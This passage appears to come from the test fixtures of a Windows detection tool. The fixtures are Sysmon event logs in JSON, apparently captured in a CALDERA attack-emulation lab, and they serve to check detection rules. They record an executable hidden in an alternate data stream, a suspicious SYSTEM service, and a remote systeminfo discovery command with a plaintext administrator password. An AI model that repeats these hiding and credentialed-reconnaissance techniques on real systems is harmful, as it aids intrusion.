"SystemTime": "4242-04-24 13:37:42.422" 92 | }, 93 | "Version": "3" 94 | } 95 | } 96 | } 97 | 
-------------------------------------------------------------------------------- /tests/SuspiciousADS.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CreationUtcTime": "2018-02-23 13:17:31.176", 5 | "Hash": "SHA1=E8B4D84A28E5EA17272416EC45726964FDF25883,MD5=09F7401D56F2393C6CA534FF0241A590,SHA256=6766717B8AFAFE46B5FD66C7082CCCE6B382CBEA982C73CB651E35DC8187ACE1,IMPHASH=68E56344CAB250384904953E978B70A9", 6 | "Image": "C:\\Windows\\system32\\cmd.exe", 7 | "ProcessGuid": "{49F1AF32-12C5-5A90-0000-00100AEA0B00}", 8 | "ProcessId": "2100", 9 | "TargetFilename": "C:\\Users\\CALDUS~1\\AppData\\Local\\Temp\\test.txt:malicious.exe", 10 | "UtcTime": "4242-04-24 13:37:42.422" 11 | }, 12 | "System": { 13 | "Channel": "Microsoft-Windows-Sysmon/Operational", 14 | "Computer": "BLAHBLAH", 15 | "Correlation": {}, 16 | "EventID": "15", 17 | "EventRecordID": "1274680", 18 | "Execution": { 19 | "ProcessID": "1408", 20 | "ThreadID": "1652" 21 | }, 22 | "Keywords": "0x8000000000000000", 23 | "Level": "4", 24 | "Opcode": "0", 25 | "Provider": { 26 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 27 | "Name": "Microsoft-Windows-Sysmon" 28 | }, 29 | "Security": { 30 | "UserID": "S-1-5-18" 31 | }, 32 | "Task": "15", 33 | "TimeCreated": { 34 | "SystemTime": "4242-04-24 13:37:42.422" 35 | }, 36 | "Version": "2" 37 | } 38 | } 39 | } 40 | { 41 | "Event": { 42 | "EventData": { 43 | "CreationUtcTime": "2018-02-23 13:21:35.152", 44 | "Hash": "SHA1=E8B4D84A28E5EA17272416EC45726964FDF25883,MD5=09F7401D56F2393C6CA534FF0241A590,SHA256=6766717B8AFAFE46B5FD66C7082CCCE6B382CBEA982C73CB651E35DC8187ACE1,IMPHASH=68E56344CAB250384904953E978B70A9", 45 | "Image": "C:\\Windows\\system32\\cmd.exe", 46 | "ProcessGuid": "{49F1AF32-12C5-5A90-0000-00100AEA0B00}", 47 | "ProcessId": "2100", 48 | "TargetFilename": "C:\\Users\\CALDUS~1\\AppData\\Local\\Temp\\test2.txt:malicious.exe", 49 | "UtcTime": "4242-04-24 13:37:42.422" 50 | }, 51 
| "System": { 52 | "Channel": "Microsoft-Windows-Sysmon/Operational", 53 | "Computer": "BLAHBLAH", 54 | "Correlation": {}, 55 | "EventID": "15", 56 | "EventRecordID": "1275071", 57 | "Execution": { 58 | "ProcessID": "1408", 59 | "ThreadID": "1652" 60 | }, 61 | "Keywords": "0x8000000000000000", 62 | "Level": "4", 63 | "Opcode": "0", 64 | "Provider": { 65 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 66 | "Name": "Microsoft-Windows-Sysmon" 67 | }, 68 | "Security": { 69 | "UserID": "S-1-5-18" 70 | }, 71 | "Task": "15", 72 | "TimeCreated": { 73 | "SystemTime": "4242-04-24 13:37:42.422" 74 | }, 75 | "Version": "2" 76 | } 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /tests/SuspiciousService.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "C:\\commander.exe", 5 | "Company": " ", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": " ", 8 | "FileVersion": "0.0.0.0", 9 | "Hashes": "SHA1=0BDEB7F7EC9281E4CBAC0B3245B7B61EA3B9AB6C,MD5=F62CD73327B30C468ECEA1A68AB4D095,SHA256=38E28F4A22206BA506C8FF60A78EB18A93027E91CF45E817EA60EF28D2E5C3C7,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", 10 | "Image": "C:\\commander.exe", 11 | "IntegrityLevel": "System", 12 | "LogonGuid": "{8C352DC7-3282-5AC7-0000-0020E7030000}", 13 | "LogonId": "0x3e7", 14 | "ParentCommandLine": "C:\\Windows\\system32\\services.exe", 15 | "ParentImage": "C:\\Windows\\System32\\services.exe", 16 | "ParentProcessGuid": "{8C352DC7-3282-5AC7-0000-0010A85F0000}", 17 | "ParentProcessId": "444", 18 | "ProcessGuid": "{8C352DC7-3D94-5AC7-0000-00109A7E1300}", 19 | "ProcessId": "1876", 20 | "Product": " ", 21 | "TerminalSessionId": "0", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | 
"EventID": "1", 30 | "EventRecordID": "241060", 31 | "Execution": { 32 | "ProcessID": "1568", 33 | "ThreadID": "1984" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | { 54 | "Event": { 55 | "EventData": { 56 | "CommandLine": "C:\\commander.exe", 57 | "Company": " ", 58 | "CurrentDirectory": "C:\\Windows\\system32\\", 59 | "Description": " ", 60 | "FileVersion": "0.0.0.0", 61 | "Hashes": "SHA1=0BDEB7F7EC9281E4CBAC0B3245B7B61EA3B9AB6C,MD5=F62CD73327B30C468ECEA1A68AB4D095,SHA256=38E28F4A22206BA506C8FF60A78EB18A93027E91CF45E817EA60EF28D2E5C3C7,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", 62 | "Image": "C:\\commander.exe", 63 | "IntegrityLevel": "System", 64 | "LogonGuid": "{8C352DC7-3282-5AC7-0000-0020E7030000}", 65 | "LogonId": "0x3e7", 66 | "ParentCommandLine": "C:\\Windows\\system32\\services.exe", 67 | "ParentImage": "C:\\Windows\\System32\\services.exe", 68 | "ParentProcessGuid": "{8C352DC7-3282-5AC7-0000-0010A85F0000}", 69 | "ParentProcessId": "444", 70 | "ProcessGuid": "{8C352DC7-3E2E-5AC7-0000-0010788D1300}", 71 | "ProcessId": "2104", 72 | "Product": " ", 73 | "TerminalSessionId": "0", 74 | "User": "NT AUTHORITY\\SYSTEM", 75 | "UtcTime": "4242-04-24 13:37:42.422" 76 | }, 77 | "System": { 78 | "Channel": "Microsoft-Windows-Sysmon/Operational", 79 | "Computer": "BLAHBLAH", 80 | "Correlation": {}, 81 | "EventID": "1", 82 | "EventRecordID": "241309", 83 | "Execution": { 84 | "ProcessID": "1568", 85 | "ThreadID": "1984" 86 | }, 87 | "Keywords": "0x8000000000000000", 88 | "Level": "4", 89 | "Opcode": "0", 90 | "Provider": { 91 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 92 | "Name": "Microsoft-Windows-Sysmon" 93 | }, 
94 | "Security": { 95 | "UserID": "S-1-5-18" 96 | }, 97 | "Task": "1", 98 | "TimeCreated": { 99 | "SystemTime": "4242-04-24 13:37:42.422" 100 | }, 101 | "Version": "5" 102 | } 103 | } 104 | } 105 | { 106 | "Event": { 107 | "EventData": { 108 | "CommandLine": "C:\\commander.exe", 109 | "Company": " ", 110 | "CurrentDirectory": "C:\\Windows\\system32\\", 111 | "Description": " ", 112 | "FileVersion": "0.0.0.0", 113 | "Hashes": "SHA1=0BDEB7F7EC9281E4CBAC0B3245B7B61EA3B9AB6C,MD5=F62CD73327B30C468ECEA1A68AB4D095,SHA256=38E28F4A22206BA506C8FF60A78EB18A93027E91CF45E817EA60EF28D2E5C3C7,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", 114 | "Image": "C:\\commander.exe", 115 | "IntegrityLevel": "System", 116 | "LogonGuid": "{8C352DC7-3282-5AC7-0000-0020E7030000}", 117 | "LogonId": "0x3e7", 118 | "ParentCommandLine": "C:\\Windows\\system32\\services.exe", 119 | "ParentImage": "C:\\Windows\\System32\\services.exe", 120 | "ParentProcessGuid": "{8C352DC7-3282-5AC7-0000-0010A85F0000}", 121 | "ParentProcessId": "444", 122 | "ProcessGuid": "{8C352DC7-3ECD-5AC7-0000-001008A31300}", 123 | "ProcessId": "1924", 124 | "Product": " ", 125 | "TerminalSessionId": "0", 126 | "User": "NT AUTHORITY\\SYSTEM", 127 | "UtcTime": "4242-04-24 13:37:42.422" 128 | }, 129 | "System": { 130 | "Channel": "Microsoft-Windows-Sysmon/Operational", 131 | "Computer": "BLAHBLAH", 132 | "Correlation": {}, 133 | "EventID": "1", 134 | "EventRecordID": "241640", 135 | "Execution": { 136 | "ProcessID": "1568", 137 | "ThreadID": "1984" 138 | }, 139 | "Keywords": "0x8000000000000000", 140 | "Level": "4", 141 | "Opcode": "0", 142 | "Provider": { 143 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 144 | "Name": "Microsoft-Windows-Sysmon" 145 | }, 146 | "Security": { 147 | "UserID": "S-1-5-18" 148 | }, 149 | "Task": "1", 150 | "TimeCreated": { 151 | "SystemTime": "4242-04-24 13:37:42.422" 152 | }, 153 | "Version": "5" 154 | } 155 | } 156 | } 157 | 
-------------------------------------------------------------------------------- /tests/SvcHostUnsignedDll.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Hashes": "SHA1=9208F94662CFE80A92D7B271838ADD91B8616618,MD5=3B367397320C26DBA890B260F80D1B1B,SHA256=50BBE71B4380B5E86E197AF86F5C08266DD6B12344BA4ABDEA604B8C774C4147,IMPHASH=275BEA6369D0DEC294882377BE493DB5", 5 | "Image": "C:\\Windows\\System32\\svchost.exe", 6 | "ImageLoaded": "C:\\Windows\\System32\\hnetcfg.dll", 7 | "ProcessGuid": "49F1AF32-4E57-59BD-0000-001016E80000", 8 | "ProcessId": "920", 9 | "Signature": "", 10 | "SignatureStatus": "Unavailable", 11 | "Signed": "false", 12 | "UtcTime": "4242-04-24 13:37:42.422" 13 | }, 14 | "System": { 15 | "Channel": "Microsoft-Windows-Sysmon/Operational", 16 | "Computer": "BLAHBLAH", 17 | "Correlation": {}, 18 | "EventID": "7", 19 | "EventRecordID": "826971", 20 | "Execution": { 21 | "ProcessID": "1332", 22 | "ThreadID": "1932" 23 | }, 24 | "Keywords": "0x8000000000000000", 25 | "Level": "4", 26 | "Opcode": "0", 27 | "Provider": { 28 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 29 | "Name": "Microsoft-Windows-Sysmon" 30 | }, 31 | "Security": { 32 | "UserID": "S-1-5-18" 33 | }, 34 | "Task": "7", 35 | "TimeCreated": { 36 | "SystemTime": "4242-04-24 13:37:42.422" 37 | }, 38 | "Version": "3" 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /tests/SvcHostUntrustedDLL.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Hashes": "SHA1=9208F94662CFE80A92D7B271838ADD91B8616618,MD5=3B367397320C26DBA890B260F80D1B1B,SHA256=50BBE71B4380B5E86E197AF86F5C08266DD6B12344BA4ABDEA604B8C774C4147,IMPHASH=275BEA6369D0DEC294882377BE493DB5", 5 | "Image": "C:\\Windows\\System32\\svchost.exe", 6 | "ImageLoaded": "C:\\Windows\\System32\\hnetcfg.dll", 7 | "ProcessGuid": 
"49F1AF32-4E57-59BD-0000-001016E80000", 8 | "ProcessId": "920", 9 | "Signature": "", 10 | "SignatureStatus": "Unavailable", 11 | "Signed": "false", 12 | "UtcTime": "4242-04-24 13:37:42.422" 13 | }, 14 | "System": { 15 | "Channel": "Microsoft-Windows-Sysmon/Operational", 16 | "Computer": "BLAHBLAH", 17 | "Correlation": {}, 18 | "EventID": "7", 19 | "EventRecordID": "826971", 20 | "Execution": { 21 | "ProcessID": "1332", 22 | "ThreadID": "1932" 23 | }, 24 | "Keywords": "0x8000000000000000", 25 | "Level": "4", 26 | "Opcode": "0", 27 | "Provider": { 28 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 29 | "Name": "Microsoft-Windows-Sysmon" 30 | }, 31 | "Security": { 32 | "UserID": "S-1-5-18" 33 | }, 34 | "Task": "7", 35 | "TimeCreated": { 36 | "SystemTime": "4242-04-24 13:37:42.422" 37 | }, 38 | "Version": "3" 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /tests/SysmonConfigChanged.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Configuration": "\u000e:\\Program Files\\RawSecTools\\SysmonConfigs\\sysmon-config-master\\skeletons\\sysmon-v6.1.xml", 5 | "ConfigurationFileHash": "SHA1=8688E886342384F1736EB4BB82C9FFC83FF1AE86", 6 | "UtcTime": "4242-04-24 13:37:42.422" 7 | }, 8 | "System": { 9 | "Channel": "Microsoft-Windows-Sysmon/Operational", 10 | "Computer": "BLAHBLAH", 11 | "Correlation": {}, 12 | "EventID": "16", 13 | "EventRecordID": "1", 14 | "Execution": { 15 | "ProcessID": "1560", 16 | "ThreadID": "2848" 17 | }, 18 | "Keywords": "0x8000000000000000", 19 | "Level": "4", 20 | "Opcode": "0", 21 | "Provider": { 22 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 23 | "Name": "Microsoft-Windows-Sysmon" 24 | }, 25 | "Security": { 26 | "UserID": "S-1-5-21-2888932017-1170430559-1631822473-1000" 27 | }, 28 | "Task": "16", 29 | "TimeCreated": { 30 | "SystemTime": "4242-04-24 13:37:42.422" 31 | }, 32 | "Version": "3" 33 | } 34 | } 
35 | } 36 | { 37 | "Event": { 38 | "EventData": { 39 | "Configuration": "C:\\Users\\calduser1\\Desktop\\agent-v0.1.0\\sysmonnew.xml", 40 | "ConfigurationFileHash": "SHA1=8D8B8FAF9F616C2962DEC9D675991F37D7C560E7", 41 | "UtcTime": "4242-04-24 13:37:42.422" 42 | }, 43 | "System": { 44 | "Channel": "Microsoft-Windows-Sysmon/Operational", 45 | "Computer": "BLAHBLAH", 46 | "Correlation": {}, 47 | "EventID": "16", 48 | "EventRecordID": "1277144", 49 | "Execution": { 50 | "ProcessID": "1640", 51 | "ThreadID": "804" 52 | }, 53 | "Keywords": "0x8000000000000000", 54 | "Level": "4", 55 | "Opcode": "0", 56 | "Provider": { 57 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 58 | "Name": "Microsoft-Windows-Sysmon" 59 | }, 60 | "Security": { 61 | "UserID": "S-1-5-21-610196800-1665352633-2058931075-500" 62 | }, 63 | "Task": "16", 64 | "TimeCreated": { 65 | "SystemTime": "4242-04-24 13:37:42.422" 66 | }, 67 | "Version": "3" 68 | } 69 | } 70 | } 71 | { 72 | "Event": { 73 | "EventData": { 74 | "Configuration": "\u000e:\\Program Files\\RawSecTools\\SysmonConfigs\\sysmon-config-master\\skeletons\\sysmon-v6.1.xml", 75 | "ConfigurationFileHash": "SHA1=8688E886342384F1736EB4BB82C9FFC83FF1AE86", 76 | "UtcTime": "4242-04-24 13:37:42.422" 77 | }, 78 | "System": { 79 | "Channel": "Microsoft-Windows-Sysmon/Operational", 80 | "Computer": "BLAHBLAH", 81 | "Correlation": {}, 82 | "EventID": "16", 83 | "EventRecordID": "1", 84 | "Execution": { 85 | "ProcessID": "2836", 86 | "ThreadID": "2840" 87 | }, 88 | "Keywords": "0x8000000000000000", 89 | "Level": "4", 90 | "Opcode": "0", 91 | "Provider": { 92 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 93 | "Name": "Microsoft-Windows-Sysmon" 94 | }, 95 | "Security": { 96 | "UserID": "S-1-5-21-2888932017-1170430559-1631822473-1000" 97 | }, 98 | "Task": "16", 99 | "TimeCreated": { 100 | "SystemTime": "4242-04-24 13:37:42.422" 101 | }, 102 | "Version": "3" 103 | } 104 | } 105 | } 106 | 
-------------------------------------------------------------------------------- /tests/SysmonStateChanged.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "SchemaVersion": "4.00", 5 | "State": "Stopped", 6 | "UtcTime": "4242-04-24 13:37:42.422", 7 | "Version": "7.01" 8 | }, 9 | "System": { 10 | "Channel": "Microsoft-Windows-Sysmon/Operational", 11 | "Computer": "BLAHBLAH", 12 | "Correlation": {}, 13 | "EventID": "4", 14 | "EventRecordID": "1272142", 15 | "Execution": { 16 | "ProcessID": "1408", 17 | "ThreadID": "1412" 18 | }, 19 | "Keywords": "0x8000000000000000", 20 | "Level": "4", 21 | "Opcode": "0", 22 | "Provider": { 23 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 24 | "Name": "Microsoft-Windows-Sysmon" 25 | }, 26 | "Security": { 27 | "UserID": "S-1-5-18" 28 | }, 29 | "Task": "4", 30 | "TimeCreated": { 31 | "SystemTime": "4242-04-24 13:37:42.422" 32 | }, 33 | "Version": "3" 34 | } 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /tests/SystemInfo.exe.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"systeminfo\" ", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "Displays system information", 8 | "FileVersion": "6.3.9600.16384 (winblue_rtm.130821-1623)", 9 | "Hashes": "SHA1=7D7AB9FD711F9B670F2977A78EF2914DB4ECDBB8,MD5=4EAD4E81DB8B24F6D29B3C71FE48DBB9,SHA256=03D2EF40E7C019A526B1AEC22B273F1C4D407973DF7F8BD5028C31CCACA9A492,IMPHASH=6012687C99DFEFA15CCE0632B5445521", 10 | "Image": "C:\\Windows\\System32\\systeminfo.exe", 11 | "IntegrityLevel": "High", 12 | "LogonGuid": "{8C352DC7-3AEA-5A94-0000-002097241100}", 13 | "LogonId": "0x112497", 14 | "ParentCommandLine": "C:\\Windows\\PSEXESVC.exe", 15 | "ParentImage": "C:\\Windows\\PSEXESVC.exe", 16 | "ParentProcessGuid": 
"{8C352DC7-3AE9-5A94-0000-0010501F1100}", 17 | "ParentProcessId": "1872", 18 | "ProcessGuid": "{8C352DC7-3AEA-5A94-0000-00106C261100}", 19 | "ProcessId": "2964", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "0", 22 | "User": "CALDERA\\Administrator", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "104668", 31 | "Execution": { 32 | "ProcessID": "1508", 33 | "ThreadID": "1960" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | { 54 | "Event": { 55 | "EventData": { 56 | "CommandLine": "\"systeminfo.exe\" /fo csv", 57 | "Company": "Microsoft Corporation", 58 | "CurrentDirectory": "C:\\Windows\\system32\\", 59 | "Description": "Displays system information", 60 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 61 | "Hashes": "SHA1=F4124883BEF7C340F90A7237DDC9606902106863,MD5=DEBEA7D13C96687CAB4248DE0B6A2CE8,SHA256=58D1231E9BD2848E5014E1968CF10B043FCEBF411EF0E7D7F75B6A41867DFB61,IMPHASH=26836CD06EB32E4DA9DE1CE8D9DB287C", 62 | "Image": "C:\\Windows\\System32\\systeminfo.exe", 63 | "IntegrityLevel": "System", 64 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 65 | "LogonId": "0x3e7", 66 | "ParentCommandLine": "C:\\commander.exe -f", 67 | "ParentImage": "C:\\commander.exe", 68 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 69 | "ParentProcessId": "920", 70 | "ProcessGuid": "{49F1AF32-38BF-5AC7-0000-0010542C0B00}", 71 | "ProcessId": "808", 72 | "Product": "Microsoft® Windows® Operating System", 
73 | "TerminalSessionId": "0", 74 | "User": "NT AUTHORITY\\SYSTEM", 75 | "UtcTime": "4242-04-24 13:37:42.422" 76 | }, 77 | "System": { 78 | "Channel": "Microsoft-Windows-Sysmon/Operational", 79 | "Computer": "BLAHBLAH", 80 | "Correlation": {}, 81 | "EventID": "1", 82 | "EventRecordID": "884591", 83 | "Execution": { 84 | "ProcessID": "1456", 85 | "ThreadID": "1712" 86 | }, 87 | "Keywords": "0x8000000000000000", 88 | "Level": "4", 89 | "Opcode": "0", 90 | "Provider": { 91 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 92 | "Name": "Microsoft-Windows-Sysmon" 93 | }, 94 | "Security": { 95 | "UserID": "S-1-5-18" 96 | }, 97 | "Task": "1", 98 | "TimeCreated": { 99 | "SystemTime": "4242-04-24 13:37:42.422" 100 | }, 101 | "Version": "5" 102 | } 103 | } 104 | } 105 | { 106 | "Event": { 107 | "EventData": { 108 | "CommandLine": "\"systeminfo.exe\" /fo csv /S calderadc.caldera.loc /U caldera\\administrator /p Admin123456", 109 | "Company": "Microsoft Corporation", 110 | "CurrentDirectory": "C:\\Windows\\system32\\", 111 | "Description": "Displays system information", 112 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 113 | "Hashes": "SHA1=F4124883BEF7C340F90A7237DDC9606902106863,MD5=DEBEA7D13C96687CAB4248DE0B6A2CE8,SHA256=58D1231E9BD2848E5014E1968CF10B043FCEBF411EF0E7D7F75B6A41867DFB61,IMPHASH=26836CD06EB32E4DA9DE1CE8D9DB287C", 114 | "Image": "C:\\Windows\\System32\\systeminfo.exe", 115 | "IntegrityLevel": "System", 116 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 117 | "LogonId": "0x3e7", 118 | "ParentCommandLine": "C:\\commander.exe -f", 119 | "ParentImage": "C:\\commander.exe", 120 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 121 | "ParentProcessId": "920", 122 | "ProcessGuid": "{49F1AF32-3ACD-5AC7-0000-00106BA81300}", 123 | "ProcessId": "596", 124 | "Product": "Microsoft® Windows® Operating System", 125 | "TerminalSessionId": "0", 126 | "User": "NT AUTHORITY\\SYSTEM", 127 | "UtcTime": "4242-04-24 13:37:42.422" 128 | }, 129 | 
"System": { 130 | "Channel": "Microsoft-Windows-Sysmon/Operational", 131 | "Computer": "BLAHBLAH", 132 | "Correlation": {}, 133 | "EventID": "1", 134 | "EventRecordID": "913762", 135 | "Execution": { 136 | "ProcessID": "1456", 137 | "ThreadID": "1712" 138 | }, 139 | "Keywords": "0x8000000000000000", 140 | "Level": "4", 141 | "Opcode": "0", 142 | "Provider": { 143 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 144 | "Name": "Microsoft-Windows-Sysmon" 145 | }, 146 | "Security": { 147 | "UserID": "S-1-5-18" 148 | }, 149 | "Task": "1", 150 | "TimeCreated": { 151 | "SystemTime": "4242-04-24 13:37:42.422" 152 | }, 153 | "Version": "5" 154 | } 155 | } 156 | } 157 | -------------------------------------------------------------------------------- /tests/UnkPrivDstPort.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "DestinationHostname": "caldera-server", 5 | "DestinationIp": "192.168.58.254", 6 | "DestinationIsIpv6": "false", 7 | "DestinationPort": "8888", 8 | "DestinationPortName": "", 9 | "Image": "C:\\Program Files\\cagent\\cagent.exe", 10 | "Initiated": "true", 11 | "ProcessGuid": "{49F1AF32-328B-5AC7-0000-0010974F0100}", 12 | "ProcessId": "1220", 13 | "Protocol": "tcp", 14 | "SourceHostname": "CALDERA01.caldera.loc", 15 | "SourceIp": "192.168.58.101", 16 | "SourceIsIpv6": "false", 17 | "SourcePort": "49727", 18 | "SourcePortName": "", 19 | "User": "NT AUTHORITY\\SYSTEM", 20 | "UtcTime": "4242-04-24 13:37:42.422" 21 | }, 22 | "System": { 23 | "Channel": "Microsoft-Windows-Sysmon/Operational", 24 | "Computer": "BLAHBLAH", 25 | "Correlation": {}, 26 | "EventID": "3", 27 | "EventRecordID": "1402320", 28 | "Execution": { 29 | "ProcessID": "1424", 30 | "ThreadID": "1680" 31 | }, 32 | "Keywords": "0x8000000000000000", 33 | "Level": "4", 34 | "Opcode": "0", 35 | "Provider": { 36 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 37 | "Name": "Microsoft-Windows-Sysmon" 38 | }, 39 | 
"Security": { 40 | "UserID": "S-1-5-18" 41 | }, 42 | "Task": "3", 43 | "TimeCreated": { 44 | "SystemTime": "4242-04-24 13:37:42.422" 45 | }, 46 | "Version": "5" 47 | } 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /tests/UntrustedDriverLoaded.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Hashes": "SHA1=2D2C9DE6A65205521D38612D0B6556DA56C9DA1D,MD5=74CC8905700C74D50B8E4EB93021FF1A,SHA256=63F1D203FD33CA31465F917D245B80D237B82EECACE9911DD9347BD7501E791A,IMPHASH=0AD99AB07319C49E4B4CB24F50171FDE", 5 | "ImageLoaded": "C:\\Windows\\System32\\VBoxDisp.dll", 6 | "Signature": "Oracle Corporation", 7 | "SignatureStatus": "Valid", 8 | "Signed": "true", 9 | "UtcTime": "4242-04-24 13:37:42.422" 10 | }, 11 | "System": { 12 | "Channel": "Microsoft-Windows-Sysmon/Operational", 13 | "Computer": "BLAHBLAH", 14 | "Correlation": {}, 15 | "EventID": "6", 16 | "EventRecordID": "836203", 17 | "Execution": { 18 | "ProcessID": "1336", 19 | "ThreadID": "1884" 20 | }, 21 | "Keywords": "0x8000000000000000", 22 | "Level": "4", 23 | "Opcode": "0", 24 | "Provider": { 25 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 26 | "Name": "Microsoft-Windows-Sysmon" 27 | }, 28 | "Security": { 29 | "UserID": "S-1-5-18" 30 | }, 31 | "Task": "6", 32 | "TimeCreated": { 33 | "SystemTime": "4242-04-24 13:37:42.422" 34 | }, 35 | "Version": "3" 36 | } 37 | } 38 | } 39 | { 40 | "Event": { 41 | "EventData": { 42 | "Hashes": "SHA1=8206E2D8374F5E7BF626E47D56D2431EDC939652,MD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CB", 43 | "ImageLoaded": "C:\\Windows\\System32\\drivers\\npf.sys", 44 | "Signature": "Riverbed Technology", 45 | "SignatureStatus": "Valid", 46 | "Signed": "true", 47 | "UtcTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "System": { 50 | "Channel": 
"Microsoft-Windows-Sysmon/Operational", 51 | "Computer": "BLAHBLAH", 52 | "Correlation": {}, 53 | "EventID": "6", 54 | "EventRecordID": "842106", 55 | "Execution": { 56 | "ProcessID": "1336", 57 | "ThreadID": "1884" 58 | }, 59 | "Keywords": "0x8000000000000000", 60 | "Level": "4", 61 | "Opcode": "0", 62 | "Provider": { 63 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 64 | "Name": "Microsoft-Windows-Sysmon" 65 | }, 66 | "Security": { 67 | "UserID": "S-1-5-18" 68 | }, 69 | "Task": "6", 70 | "TimeCreated": { 71 | "SystemTime": "4242-04-24 13:37:42.422" 72 | }, 73 | "Version": "3" 74 | } 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /tests/UntrustedService.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "Company": "Oracle Corporation", 5 | "Description": "VirtualBox Guest Additions Service", 6 | "FileVersion": "6.0.8.130520", 7 | "Hashes": "SHA1=AE49D900887E95D7B3040BFD2C888D3439F94035,MD5=3001126B78719A1189A0A5270DA316A0,SHA256=9A66844E7ADA8E2D1D454136D68413CE74D90004BAD754D79DAA1A020A27E86C,IMPHASH=6A98677D1BE25D4274AAA7C9C37E832F", 8 | "Image": "C:\\Windows\\System32\\VBoxService.exe", 9 | "ImageLoaded": "C:\\Windows\\System32\\VBoxService.exe", 10 | "ImageLoadedSize": "2732048", 11 | "IntegrityLevel": "System", 12 | "OriginalFileName": "?", 13 | "ParentCommandLine": "C:\\Windows\\system32\\services.exe", 14 | "ParentImage": "C:\\Windows\\System32\\services.exe", 15 | "ProcessGuid": "{515cd0d1-4af8-5d3f-0000-0010b4430100}", 16 | "ProcessId": "1488", 17 | "Product": "Oracle VM VirtualBox Guest Additions", 18 | "RuleName": "", 19 | "Signature": "Oracle Corporation", 20 | "SignatureStatus": "Valid", 21 | "Signed": "true", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 
